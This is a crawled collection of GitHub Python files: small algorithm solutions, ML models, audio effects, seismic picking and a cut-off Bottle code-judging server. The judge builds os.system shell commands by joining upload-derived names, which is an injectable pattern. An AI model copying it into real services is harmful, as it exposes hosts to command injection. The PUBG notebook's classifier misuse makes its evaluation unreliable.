'Ogi':'Não há veiculo adequado' }\n\n if lala.num_vec == 1 and ogi.num_vec == 1: \n return { 'Lala':lala.veiculos[0].tipo, 'Ogi':ogi.veiculos[0].tipo }\n \n","repo_name":"ian011403/Desafio-Data-Machina","sub_path":"Veículo Ideal/converte.py","file_name":"converte.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1210216322","text":"\"\"\"\n계단오르기\n22.02.09\n\n\n6\n10\n20\n15\n25\n10\n20\n\n\n\"\"\"\n\ndef solution(n, w):\n if n == 1:\n return w[0]\n if n == 2:\n return w[0] + w[1]\n\n dp = [0 for _ in range(n+1)]\n dp[0], dp[1], dp[2] = 0, w[0], w[0]+w[1]\n for k in range(3, n+1):\n dp[k] = max(dp[k-3]+w[k-2]+w[k-1], dp[k-2]+w[k-1])\n return dp[n]\n\n\nn = int(input())\nw = [int(input()) for _ in range(n)]\nprint(solution(n, w))\n","repo_name":"angelatto/Algorithm","sub_path":"BAEKJOON/1일1솔/2579.py","file_name":"2579.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2243466776","text":"import sys\nfrom paralympic_app import db\nfrom paralympic_app.models import Event\nfrom paralympic_app.schemas import EventSchema\n\n\n# Marshmallow Schemas\nevents_schema = EventSchema(many=True)\nevent_schema = EventSchema()\n\n\ndef get_events():\n \"\"\"Function to get all events from the database as objects and convert to json.\n\n NB: This was extracted to a separate function as it is used in multiple places\n \"\"\"\n all_events = db.session.execute(db.select(Event)).scalars()\n event_json = events_schema.dump(all_events)\n return event_json\n\n\ndef get_event(event_id):\n \"\"\"Function to get a single event as a json structure\n\n :return Event json or None: Event JSON if event exists, otherwise None\"\"\"\n event = db.session.execute(\n db.select(Event).filter_by(event_id=event_id)\n ).scalar_one_or_none()\n if event:\n result = events_schema.dump(event)\n return result\n else:\n return event\n","repo_name":"megorov12/paralympics_and_others","sub_path":"paralympic_app/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4256945223","text":"import tensorflow as tf\nfrom tensorflow.keras import Model, Sequential\nfrom 
tensorflow.keras.layers import Layer\n\nfrom hanser.models.layers import Pool2d, Conv2d, Norm, Act, GlobalAvgPool, Linear\nfrom hanser.models.modules import PadChannel\nfrom hanser.models.cifar.shakedrop.layers import ShakeDrop\n\n__all__ = [\n \"PyramidNet\"\n]\n\n\nclass Shortcut(Sequential):\n def __init__(self, in_channels, out_channels, stride):\n layers = []\n if stride == 2:\n layers.append(Pool2d(2, 2, type='avg'))\n if in_channels != out_channels:\n layers.append((PadChannel(out_channels - in_channels)))\n super().__init__(layers)\n\n\nclass BasicBlock(Layer):\n expansion = 1\n\n def __init__(self, in_channels, channels, stride=1, p_shakedrop=0):\n super().__init__()\n branch1 = [\n Norm(in_channels),\n Conv2d(in_channels, channels, kernel_size=3, stride=stride,\n norm='def', act='def'),\n Conv2d(channels, channels, kernel_size=3, norm='def'),\n ]\n if p_shakedrop:\n branch1.append(ShakeDrop(p_shakedrop, (-1, 1), (0, 1)))\n self.branch1 = Sequential(branch1)\n self.branch2 = Shortcut(in_channels, channels, stride)\n\n def call(self, x):\n return self.branch1(x) + self.branch2(x)\n\n\nclass Bottleneck(Layer):\n expansion = 4\n\n def __init__(self, in_channels, channels, stride=1, p_shakedrop=0):\n super().__init__()\n out_channels = channels * self.expansion\n branch1 = [\n Norm(in_channels),\n Conv2d(in_channels, channels, kernel_size=1,\n norm='def', act='def'),\n Conv2d(channels, channels, kernel_size=3, stride=stride,\n norm='def', act='def'),\n Conv2d(channels, out_channels, kernel_size=1,\n norm='def'),\n ]\n if p_shakedrop:\n branch1.append(ShakeDrop(p_shakedrop, (-1, 1), (0, 1)))\n self.branch1 = Sequential(branch1)\n self.branch2 = Shortcut(in_channels, out_channels, stride)\n\n def call(self, x):\n return self.branch1(x) + self.branch2(x)\n\n\ndef rd(c):\n return int(round(c, 2))\n\n\nclass PyramidNet(Model):\n def __init__(self, start_channels, alpha, depth, block='bottleneck', p_shakedrop=0.5, num_classes=10):\n super().__init__()\n\n if block == 'basic':\n num_layers = [(depth - 2) // 6] * 3\n block = BasicBlock\n elif block == 'bottleneck':\n num_layers = [(depth - 2) // 9] * 3\n block = Bottleneck\n else:\n raise ValueError(\"block must be `basic` or `bottleneck`, got %s\" % block)\n\n self.num_layers = num_layers\n\n strides = [1, 2, 2]\n\n add_channel = alpha / sum(num_layers)\n in_channels = start_channels\n\n self.init_block = Conv2d(3, start_channels, kernel_size=3, norm='def')\n\n channels = start_channels\n k = 1\n units = []\n for n, s in zip(num_layers, strides):\n for i in range(n):\n stride = s if i == 0 else 1\n channels = channels + add_channel\n units.append(block(in_channels, rd(channels), stride=stride,\n p_shakedrop=k / sum(num_layers) * p_shakedrop))\n in_channels = rd(channels) * block.expansion\n k += 1\n\n self.units = units\n self.post_activ = Sequential([\n Norm(in_channels),\n Act(),\n ])\n\n assert (start_channels + alpha) * block.expansion == in_channels\n\n self.final_pool = GlobalAvgPool()\n self.fc = Linear(in_channels, num_classes)\n\n def call(self, x):\n x = self.init_block(x)\n for unit in self.units:\n x = unit(x)\n x = self.post_activ(x)\n\n x = self.final_pool(x)\n x = self.fc(x)\n return x\n\n\ndef test_net():\n model = PyramidNet(16, 270, 164, 'bottleneck')\n model.build((None, 32, 32, 3))\n model.call(tf.keras.layers.Input((32, 32, 3)))\n 
model.summary()","repo_name":"sbl1996/hanser","sub_path":"hanser/models/cifar/shakedrop/pyramidnet.py","file_name":"pyramidnet.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"2511961055","text":"\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\n\n# In[3]:\n\n\nimport xgboost as xgb\n\n\n# In[4]:\n\n#use 10000 records for model training\npd.set_option(\"display.max_columns\", 500)\ntrain = pd.read_csv(\"../input/train_V2.csv\")\ntrain = train.sample(n=10000, random_state=1)\n\n\n# In[5]:\n\n\ntrain.head(10)\n\n\n# In[6]:\n\n\ntrain.shape\n\n\n\n\n# In[8]:\n\n#delete irrelevant columns which won't effect the winning percentage\ndel(train[\"Id\"])\ndel(train[\"groupId\"])\ndel(train[\"matchId\"])\ntrain.shape\n\n\n# In[9]:\n\n\ntrain.head(10)\n\n\n# In[10]:\n\n\ntrain['matchType'].value_counts()\n\n\n# In[11]:\n\n#ecode categorical variable \"matchtype\" into numeric value\nfrom sklearn import preprocessing\nle = preprocessing.LabelEncoder()\nle.fit(train['matchType'])\nle.classes_\n\n\n# In[12]:\n\n\narray =le.transform(train['matchType'])\nprint(array)\n\n\n# In[13]:\n\n\nMatchType = pd.DataFrame(array)\nprint(MatchType)\n\n\n# In[14]:\n\n#delete the old categorical columns and replaced it with encoded column\ndel(train['matchType'])\ntrain.insert(loc=12, column='matchType', value=MatchType)\nprint(train.head(10))\n\n\n# In[15]:\n\n#check if there is missing labled value before start training\ntrain.loc[:,'winPlacePerc'].isnull().sum()\n\n\n\n#create arrays for features to be train and target prediction\nX,y = train.iloc[:,:-1], train.iloc[:,-1]\n\n\n# In[22]:\n\n\n#create the training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2,random_state=123)\n\n\n# In[23]:\n\n\n#### Model 1: Classification tree with XGBoost\nxg_cl = xgb.XGBClassifier(objective = 'reg:linear', n_estimator=10,seed=123)\n\n\n# In[24]:\n\n\nxg_cl.fit(X_train, y_train)\n\n\n# In[25]:\n\n\npreds = xg_cl.predict(X_test)\n\n\n# In[26]:\n\n#test model quality with accuracy\naccuracy = float(np.sum(preds==y_test))/y_test.shape[0]\nprint(\"accuracy: %f\" %(accuracy))\n\n\n# In[27]:\n\n\n#boosting with CV to select the best model\nPUBG_dmatrix = xgb.DMatrix(data=X, label=y)\nparams = {\"objective\": \"reg:linear\", \"max_depth\" :3}\n\n\n# In[28]:\n\n\ncv_results = xgb.cv(dtrain= PUBG_dmatrix, params=params, nfold=3, num_boost_round =5, metrics=\"error\",as_pandas=True, seed=123)\n\n\n# In[29]:\n\n\nprint(cv_results)\n\n\n# In[30]:\n\n\nprint(((1-cv_results[\"test-error-mean\"]).iloc[-1]))\n\n\n# In[31]:\n\n\n#test model quality with AUC under CV\nfrom sklearn import metrics\n\n\n# In[32]:\n\n\ncv_results = xgb.cv(dtrain=PUBG_dmatrix, params=params, nfold=3, num_boost_round=5,metrics=\"auc\",as_pandas=True,seed=123)\nprint(cv_results)\n\n\n# In[33]:\n\n\nprint((cv_results[\"test-auc-mean\"]).iloc[-1])\n\n\n# In[34]:\n\n\n#### Model 2: Regression tree with XGBoost\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=123)\n\n\n# In[35]:\n\n\nxg_reg= xgb.XGBRegressor(objective = \"reg:linear\", n_estimators=10, seed=123)\n\n\n# In[36]:\n\n\nxg_reg.fit(X_train, y_train)\n\n\n# In[37]:\n\n\npreds = xg_reg.predict(X_test)\n\n\n# In[38]:\n\n#test model with MSE \nfrom sklearn.metrics import mean_squared_error\nrmse = np.sqrt(mean_squared_error(y_test,preds))\nprint(\"RMSE: %f\" 
% (rmse))\n\n\n# In[39]:\n\n#### Model 3: Linear Regression\n#Linear Base Learner\nDM_train = xgb.DMatrix(data= X_train, label= y_train)\nDM_test = xgb.DMatrix(data= X_test, label=y_test)\n\nparams = {\"booster\":\"gblinear\", \"objective\":\"reg:linear\"}\n\n\n# In[40]:\n\n\nxg_linear = xgb.train(params=params, dtrain=DM_train, num_boost_round=10)\n\n\n# In[41]:\n\n\npreds = xg_linear.predict(DM_test)\npreds.shape\n\n\n# In[42]:\n\n#test model with RMSE\nrmse = np.sqrt(mean_squared_error(y_test, preds))\nprint(\"RMSE: %f\" % (rmse))\n\n\n# In[43]:\n\n\n####Tuning Model with Linear Regression\n\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\n\nparams = {\"objective\":\"reg:linear\", \"max_depth\":4}\n\ncv_results = xgb.cv(dtrain=pubg_dmatrix, params=params, nfold=4, num_boost_round=5, metrics=\"mae\", as_pandas=True, seed=123)\n\nprint(cv_results)\n\n\n# In[44]:\n\n\nprint((cv_results[\"test-mae-mean\"]).tail(1))\n\n\n# In[45]:\n\n\n## Regularization in XGBoosting\n\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\nreg_params = [1,10,100]\n\nparams = {\"objective\":\"reg:linear\", \"max_depth\":3}\n\n#create an empty list for storing rmses as a function of l2 complexity\nrmses_l2 = []\n\n#iterate over reg_params\nfor reg in (reg_params):\n    params[\"lambda\"] = reg\n    cv_results_rmse = xgb.cv(dtrain=pubg_dmatrix, params=params, nfold=4, num_boost_round=5, metrics= \"rmse\",as_pandas=True, seed=123)\n    rmses_l2.append(cv_results_rmse[\"test-rmse-mean\"].tail(1).values[0]) \n\nprint(cv_results_rmse)\n\n\n# In[46]:\n\n\nprint(\"Best rmse as a function of l2:\")\nprint(pd.DataFrame(list(zip(reg_params, rmses_l2)), columns=[\"l2\",\"rmse\"]))\n\n\n\n# In[47]:\n\n\n## Tuning with boosting rounds\npubg_dmatrix = xgb.DMatrix(data = X, label = y)\nparams = {\"objective\":\"reg:linear\", \"max_depth\":3}\nnum_rounds = [5,10,15]\nfinal_rmse_per_round = []\nfor curr_num_rounds in num_rounds:\n    cv_results = xgb.cv(dtrain=pubg_dmatrix, params=params, nfold=3, num_boost_round=curr_num_rounds, metrics=\"rmse\",as_pandas=True, seed=123)\n    \n    final_rmse_per_round.append(cv_results[\"test-rmse-mean\"].tail().values[-1])\nprint(cv_results)\n\n\n# In[48]:\n\n\nprint(pd.DataFrame(list(zip(num_rounds, final_rmse_per_round)), columns=[\"num-boosting-rounds\",\"rmse\"]))\n\n\n# In[51]:\n\n\n## Auto boosting round selection using early_stopping\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\nparams = {\"objective\":\"reg:linear\", \"max_depth\":4}\ncv_results = xgb.cv(params = params, dtrain=pubg_dmatrix,metrics =\"rmse\", seed=123,num_boost_round = 50, early_stopping_rounds=10) \nprint(cv_results)\n\n\n# In[52]:\n\n\n## Tuning Learning Rate\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\nparams = {\"objective\":\"reg:linear\", \"max_depth\":3}\neta_vals = [0.001,0.01,0.1]\nbest_rmse = []\n\nfor curr_val in eta_vals:\n    params[\"eta\"] = curr_val\n    \n    cv_results = xgb.cv(dtrain=pubg_dmatrix, params=params, nfold=3, num_boost_round=10, early_stopping_rounds=5, metrics=\"rmse\", as_pandas=True, seed=123)\n    \n    best_rmse.append(cv_results[\"test-rmse-mean\"].tail().values[-1])\n\n\n# In[53]:\n\n\nprint(pd.DataFrame(list(zip(eta_vals, best_rmse)), columns = [\"eta\",\"best_rmse\"]))\n\n\n# In[54]:\n\n\n#### Grid Search with XGBoosting\nfrom sklearn.model_selection import GridSearchCV\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\ngbm_param_grid = {\n    'colsample_bytree': [0.3,0.7,0.9],\n    'n_estimators':[50,100,150,200],\n    'max_depth': [2,5,7],\n    \n    \n}\n\ngbm = xgb.XGBRegressor()\n\ngrid_mse = GridSearchCV(param_grid = gbm_param_grid, 
estimator=gbm, scoring = \"neg_mean_squared_error\", cv=4, verbose = 1)\n\n\n# In[55]:\n\n\ngrid_mse.fit(X,y)\n\n\n# In[56]:\n\n\nprint(\"Best parameters found:\", grid_mse.best_params_)\nprint(\"Lowest RMSE found:\", np.sqrt(np.abs(grid_mse.best_score_)))\n\n\n# In[57]:\n\n####RandomizedSearchCV\nfrom sklearn.model_selection import RandomizedSearchCV\ngbm_param_grid = {'n_estimators': [25],\n                  'max_depth': range(2,12)\n                  }\ngbm = xgb.XGBRegressor(n_estimators=10)\n\nrandomized_mse = RandomizedSearchCV(param_distributions = gbm_param_grid,estimator = gbm, scoring = \"neg_mean_squared_error\", n_iter = 5, cv = 4, verbose = 1 )\n\n\n# In[58]:\n\n\nrandomized_mse.fit(X,y)\n\n\n# In[59]:\n\n\nprint(\"Best parameters found:\", randomized_mse.best_params_)\nprint(\"Lowest RMSE found:\", np.sqrt(np.abs(randomized_mse.best_score_)))\n\n\n# In[88]:\n\n####used the model built from GridSearch on test set for prediction\ntest = pd.read_csv(\"../input/test_V2.csv\")\n\n\n# In[89]:\n\n\ntest.shape\n\n\n# In[90]:\n\n\ntest.head(20)\n\n\n# In[94]:\n\n#extract Id column for future use in submission file\ntest_id = test.loc[:,\"Id\"]\nprint(test_id)\n\n\n# In[75]:\n\n#delete irrelevant identifier columns\ndel(test[\"Id\"])\ndel(test[\"groupId\"])\ndel(test[\"matchId\"])\ntest.head(10)\n\n\n# In[67]:\n\n#encode the \"matchType\" column with numeric values\nfrom sklearn import preprocessing\nle = preprocessing.LabelEncoder()\nle.fit(test['matchType'])\nle.classes_\n\n\n# In[68]:\n\n\narray_test =le.transform(test['matchType'])\nprint(array_test)\n\n\n# In[69]:\n\n\nMatchType_1 = pd.DataFrame(array_test)\nprint(MatchType_1)\n\n\n# In[76]:\n\n#replace the categorical column with the encoded numeric values\ndel(test['matchType'])\ntest.insert(loc=12, column='matchType', value=MatchType_1)  # use the test-set encoding, not the training one\nprint(test.head(10))\n\n\n# In[85]:\n\n#apply the fitted grid_mse model for prediction\npred_test = grid_mse.predict(test)\n\n\n# In[86]:\n\n\nprint(pred_test)\n\n\n# In[79]:\n\n\npred_test.shape\n\n\n# In[87]:\n\n\npred_test_df = pd.DataFrame(pred_test, columns = ['winPlacePerc'])\nprint(pred_test_df)\n\n\n# In[95]:\n\n#insert Id column back into the final winPlacePerc prediction\npred_test_df.insert(loc=0, column='Id', value=test_id)\n\n\n# In[96]:\n\n\nprint(pred_test_df)\n\n\n# In[98]:\n\n\npred_test_df.to_csv('pred_test_submission.csv', index = False)\n\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/pubg-finish-placement-prediction/Jocelyn/pubg-submission.py","file_name":"pubg-submission.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"}
{"seq_id":"16923649504","text":"from __future__ import annotations\n\nimport numbers\nfrom typing import Callable\n\nimport librosa\nimport numpy as np\nimport soxr\nfrom numpy.typing import NDArray\n\nfrom nwave.base import BaseEffect\n\n__all__ = [\"Wrapper\", \"Resample\", \"PadSilence\"]\n\n\nclass Wrapper(BaseEffect):\n    def __init__(\n        self,\n        function: Callable,\n        data_arg: str | None = None,\n        sr_arg: str | None = None,\n        output_sr_override: float | None = None,\n        **kwargs,\n    ) -> None:\n        \"\"\"\n        Wrapper for any Callable as an Audio Effect. The function\n        must return a NDArray or a 2 length tuple containing a NDArray\n        and a float or int as the sample rate.\n\n        Args:\n            function: Callable to wrap\n            data_arg: Name of the data keyword argument of type NDArray. 
If\n None, the first positional argument will be used.\n sr_arg: Name of the sample rate keyword argument of type float\n output_sr_override: Define a fixed output expected sample rate\n for cases where only one element of NDArray is returned\n kwargs: Additional keyword arguments to pass to the callable\n \"\"\"\n super().__init__()\n # Check if callable\n if not callable(function):\n raise TypeError(f\"Expected Callable, got {type(function)}\")\n self._function = function\n self._kwargs = kwargs # Store kwargs to pass to function\n self._data_arg = data_arg\n self._sr_arg = sr_arg\n self._output_sr_override = output_sr_override\n\n def apply(self, data: NDArray, sr: float) -> tuple[NDArray, float]:\n # Add the data and sr keyword arguments\n kwargs = self._kwargs\n if self._sr_arg:\n kwargs[self._sr_arg] = sr\n if self._data_arg:\n kwargs[self._data_arg] = data\n result = self._function(**kwargs)\n else:\n # If no data kwarg supplied, add the first positional argument as data\n result = self._function(data, **kwargs)\n\n # For NDArray, return the original sr with it\n if isinstance(result, np.ndarray):\n # If override is defined, return the override\n if self._output_sr_override is not None:\n return result, self._output_sr_override\n return result, sr\n # For 2 length tuple, return the correct ordered result\n elif isinstance(result, tuple) and len(result) == 2:\n if isinstance(result[0], np.ndarray) and isinstance(\n result[1], (int, float)\n ):\n return result[0], float(result[1])\n if isinstance(result[1], np.ndarray) and isinstance(\n result[0], (int, float)\n ):\n return result[1], float(result[0])\n # Otherwise raise an error\n raise TypeError(\n \"Function expected to return NDArray \"\n f\"or tuple containing [NDArray, float], got {type(result).__name__}\"\n )\n\n\nclass Resample(BaseEffect):\n def __init__(self, sample_rate: int, quality: str = \"HQ\") -> None:\n \"\"\"\n Resamples the audio to a new sample rate.\n\n Args:\n sample_rate: Target Sample Rate in Hz.\n quality: Resample Quality (One of 'QQ', 'LQ', 'MQ', 'HQ', 'VHQ')\n \"\"\"\n super().__init__()\n self.sample_rate = sample_rate\n self.quality = quality\n self.qualities = {\"QQ\", \"LQ\", \"MQ\", \"HQ\", \"VHQ\"}\n if not isinstance(self.sample_rate, numbers.Real) or self.sample_rate <= 0:\n raise ValueError(\"Sample rate must be a positive real number.\")\n if self.quality not in self.qualities:\n raise ValueError(\n f\"Invalid quality: {self.quality}. 
Must be one of {self.qualities}\"\n )\n\n def apply(self, data, sr) -> tuple[NDArray, float]:\n if sr == self.sample_rate:\n return data, sr # Skip processing if already at target sample rate\n return (\n soxr.resample(data, in_rate=sr, out_rate=self.sample_rate),\n self.sample_rate,\n )\n\n\nclass PadSilence(BaseEffect):\n def __init__(self, start: float, end: float) -> None:\n \"\"\"\n Pads the beginning and end of the audio with silence.\n\n Args:\n start: Padding to add to the start of the audio in seconds.\n end: Padding to add to the end of the audio in seconds.\n \"\"\"\n if start < 0 or end < 0:\n raise ValueError(\"Padding must be positive.\")\n super().__init__()\n self.start = start\n self.end = end\n\n def apply(self, data: NDArray, sr: float) -> tuple[NDArray, float]:\n \"\"\"\n Pads a wave array with silence\n\n Args:\n data: Wave array to pad\n sr: Sample rate of the wave array\n\n Returns:\n Tuple of (padded wave array, sample rate)\n \"\"\"\n # Convert from seconds to samples\n pad_s = int(self.start * sr)\n pad_e = int(self.end * sr)\n # Generate zero arrays\n start_samples = np.zeros(pad_s, dtype=np.float32)\n end_samples = np.zeros(pad_e, dtype=np.float32)\n # Concatenate arrays and return\n return np.concatenate((start_samples, data, end_samples), dtype=np.float32), sr\n\n\nclass TimeStretch(BaseEffect):\n def __init__(self, factor: float) -> None:\n \"\"\"\n Time stretches the audio by a factor.\n\n Args:\n factor: Time stretch factor. >1.0 will speed up, <1.0 will slow down.\n \"\"\"\n if factor <= 0:\n raise ValueError(\"Factor must be positive.\")\n super().__init__()\n self.factor = factor\n\n def apply(self, data: NDArray, sr: float) -> tuple[NDArray, float]:\n \"\"\"\n Time stretches a wave array by a factor.\n \"\"\"\n return librosa.effects.time_stretch(data, rate=self.factor), sr\n","repo_name":"ionite34/nwave","sub_path":"src/nwave/effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":5908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"1673278233","text":"#!/usr/bin/env python\n#Disclaimer:\n\n#This software is preliminary or provisional and is subject to revision. It is \n#being provided to meet the need for timely best science. The software has not \n#received final approval by the U.S. Geological Survey (USGS). No warranty, \n#expressed or implied, is made by the USGS or the U.S. Government as to the \n#functionality of the software and related material nor shall the fact of release \n#constitute any such warranty. The software is provided on the condition that \n#neither the USGS nor the U.S. 
Government shall be held liable for any damages \n#resulting from the authorized or unauthorized use of the software.\n\n\n\nfrom obspy.clients.fdsn import Client\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom obspy.core import UTCDateTime\nfrom obspy.geodetics import gps2dist_azimuth\nimport matplotlib\nfrom obspy.taup import TauPyModel\nfrom scipy import signal as scisig\nfrom matplotlib import cm\n\nimport FilterPicker as fp\n\n# Function to do some plotting of events, the filtered version, and CF's\ndef PlotTn(tr,Tlong,domper,stat,mag,Edist):\n    dT=tr.stats.delta\n    nTlong=int(min(np.floor(Tlong/dT),np.floor(len(tr.data)-1)))\n    N = int(np.ceil(np.log2(domper/dT)))+1\n    fig=plt.figure(1,figsize=(12,12))\n    t=np.linspace(0, (tr.stats.npts-1)/ tr.stats.sampling_rate,num=tr.stats.npts)-Tlong*2\n    plt.subplot(int(np.floor(N/2.))+2,1,1)\n    plt.plot(t,tr,'k')\n    plt.ylabel('raw')\n    plt.xlim([-10 , 20])\n    #for n in range(N):\n    n=0\n    nn=1\n    while n <= N: \n        nn=nn+1\n        plt.subplot(int(np.floor(N/2.))+2,1,nn)\n        plt.plot(t,fp.DiffFilt(tr,n,Tlong),'k')\n        plt.ylabel('T%i=%2.2fs' % (n, (2.**n)*dT) )\n        plt.xlim([-10 , 20])\n        n=n+2\n    plt.xlabel('Time [s]')\n    plt.suptitle(stat.code + ' m' + str(mag) + ' dist=' + str(Edist)+'km')\n    fig=plt.figure(2,figsize=(12,12))\n    plt.subplot(int(np.floor(N/2.))+3,1,1)\n    plt.plot(t,tr,'k')\n    plt.ylabel('raw')\n    plt.xlim([-10 , 20])\n    n=0\n    nn=1\n    while n <= N: \n        nn=nn+1\n        plt.subplot(int(np.floor(N/2.))+3,1,nn)\n        plt.plot(t,fp.CreateCF(tr,n,Tlong),'k')\n        plt.xlim([-10 , 20])\n        ax=plt.gca()\n        plt.text(-9,max(ax.get_ylim())*.75,'CF T%i=%2.2fs' % (n, (2.**n)*dT) )\n        n=n+2\n    plt.subplot(int(np.floor(N/2.))+3,1,int(np.floor(N/2.))+3)\n    sumCF, CFind = fp.CreateSummaryCF(tr,Tlong,domper)\n    plt.plot(t,sumCF,'k')\n    plt.xlim([-10 , 20])\n    ax=plt.gca()\n    plt.text(-9,max(ax.get_ylim())*.75,'Summary CF')\n    plt.xlabel('Time [s]')\n    plt.suptitle(stat.code + ' m' + str(mag) + ' dist=' + str(Edist)+'km')\n    fig=plt.figure(3,figsize=(12,12))\n    viridis = cm.get_cmap('viridis', N)\n    y = np.append([np.mean(tr.data[1:nTlong])], tr.data)\n    yp=[0.]\n    for i in range(1,len(tr.data)):\n        yp.append(y[i]-y[i-1])\n    f1, Pxx1 = scisig.periodogram(yp, 1./dT)\n    n=0\n    while n <= N: \n        f, Pxx = scisig.periodogram(fp.DiffFilt(tr,n,Tlong), 1./dT)\n        Pxdiff=10*np.log10(Pxx)-10*np.log10(Pxx1)\n        plt.semilogx(1./f, Pxdiff,color=viridis(1.0*n/N))\n        plt.text(50,Pxdiff[1],'T%i=%2.2fs' % (n, (2.**n)*dT), color=viridis(1.0*n/N))\n        n=n+2\n    plt.xlabel('Period [s]')\n    plt.ylabel('dB relative to unfiltered')\n    plt.suptitle(stat.code + ' m' + str(mag) + ' dist=' + str(Edist)+'km')\n    plt.show()\n\n\n\nmodel = TauPyModel(model=\"iasp91\")\nclient = Client(\"IRIS\")\n\n# stuff to define for the FilterPicker\nTlong=30 # a time averaging scale in seconds\ndomper = 20 # dominant period that you want to pick up to\n\nstarttime = UTCDateTime(\"2018-08-01\")\nendtime = UTCDateTime(\"2019-08-01\")\n# coordinates and radius of study area\nlat=34.9\nlon=-106.5\nrad=1.5 # in degrees\n#max sensor to event distance to analyze\nmax_epi_dist = 250\n#minimum magnitude to analyze\nminmag=2.2\n\nstas= \"*\"\nnets=\"IU\"\nchans=\"HHZ,BHZ\"\n\ndebug = True\n\n# grab some earthquakes\ncat = client.get_events(starttime=starttime, endtime=endtime, minmagnitude=minmag,latitude=lat, longitude=lon, maxradius=rad)\n\n# grab a station list\ninventory = client.get_stations(network=nets,station=stas,channel=chans,starttime=starttime, endtime=endtime, latitude=lat, longitude=lon, maxradius=rad)\nprint(inventory)\n\nfor cnet in inventory:\n    for stat in cnet:\n        print(stat)\n        for 
evt in cat:\n            try:\n                tim=evt.origins[0].time\n                epi_dist, az, baz = gps2dist_azimuth(evt.origins[0].latitude,evt.origins[0].longitude, stat.latitude, stat.longitude)\n                epi_dist = epi_dist / 1000\n                arrivals = model.get_travel_times(source_depth_in_km=evt.origins[0].depth / 1000,\n                                      distance_in_degree=epi_dist/111.1949,\n                                      phase_list=[\"p\",\"P\"])\n                arrp=arrivals[0]\n                arrivals = model.get_travel_times(source_depth_in_km=evt.origins[0].depth / 1000,\n                                      distance_in_degree=epi_dist/111.1949,\n                                      phase_list=[\"s\",\"S\"])\n                arrs=arrivals[0]\n                print(arrp, arrs)\n                if epi_dist <= max_epi_dist: \n                    st = client.get_waveforms(cnet.code, stat.code, \"*\", chans, tim+arrp.time-Tlong*2, tim+arrs.time+30, attach_response=True)\n                    print(cnet.code, stat.code, chans, tim, len(st))\n                    if debug == True:\n                        PlotTn(st[0],Tlong,domper,stat,evt.magnitudes[0].mag,round(epi_dist))\n            except:\n                print(\"Could not fetch %s-%s %s\" % (cnet.code, stat.code, tim))\n    \n\n","repo_name":"dwilson-usgs/SeismicNetworkDetectionModeling","sub_path":"EventFPickerExample.py","file_name":"EventFPickerExample.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"}
{"seq_id":"11251824792","text":"'''\nClass used for displaying a list of point cloud faces\n'''\nimport open3d as o3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nclass view_face:\n    def __init__(self, faces):\n        self.faces = faces\n        self.vis = o3d.visualization.Visualizer()\n    \n\n    def display(self):\n        self.vis.create_window()\n\n        \n        v = self.faces\n        for x in v:\n            self.vis.clear_geometries()\n            pcd = o3d.geometry.PointCloud()\n            pcd.points = o3d.utility.Vector3dVector(x)\n            self.vis.add_geometry(pcd)\n\n            self.vis.update_geometry(pcd)\n            self.vis.poll_events()\n            self.vis.update_renderer()\n            time.sleep(1)\n\n        # self.vis.run()\n        \n        self.vis.destroy_window()\n","repo_name":"Liam-Watson/PCE-GAN","sub_path":"qual_assessment_portal/view_face.py","file_name":"view_face.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"4382640917","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport random\nimport string\nfrom bottle import *\nfrom bottle import request, route, run, static_file\n\nvalue=None\n\n@route('/')\ndef index():\n    return static_file('index.html', './')\n\nsite = '192.68.4.124'\n\nbase_path = os.path.dirname(os.path.realpath(__file__)) # get the script's directory\n\nupload_path = os.path.join(base_path, 'upload') # upload file directory\nif not os.path.exists(upload_path):\n    os.makedirs(upload_path)\n\n\n@route('/', method='GET')\n\n\n#@route('/upload', method='GET')\n#@route('/index.html', method='GET')\n#@route('/upload.html', method='GET')\ndef index():\n    return static_file('index.html', './')\n    \n    \ndef judge(simp_name, problem_id):\n#    print('JUDGE ' + simp_name + ' ' + problem_id)\n    print('cp ./upload/' + simp_name + '.cpp' + ' ' + './problems/' + problem_id + '/' + simp_name + '.cpp')\n    os.system('cp ./upload/' + simp_name + '.cpp' + ' ' + './problems/' + problem_id + '/' + simp_name + '.cpp')\n    print('cd ./problems/' + problem_id + ' && syzoj judge ' + simp_name + '.cpp > ' + simp_name + '.txt')\n    os.system('cd ./problems/' + problem_id + ' && syzoj judge ' + simp_name + '.cpp > ' + simp_name + '.txt')\n    print('rm ./problems/' + problem_id + '/' + simp_name + '.cpp')\n    os.system('rm ./problems/' + problem_id + '/' + simp_name + '.cpp')\n    print('mv ./problems/' + problem_id + '/' 
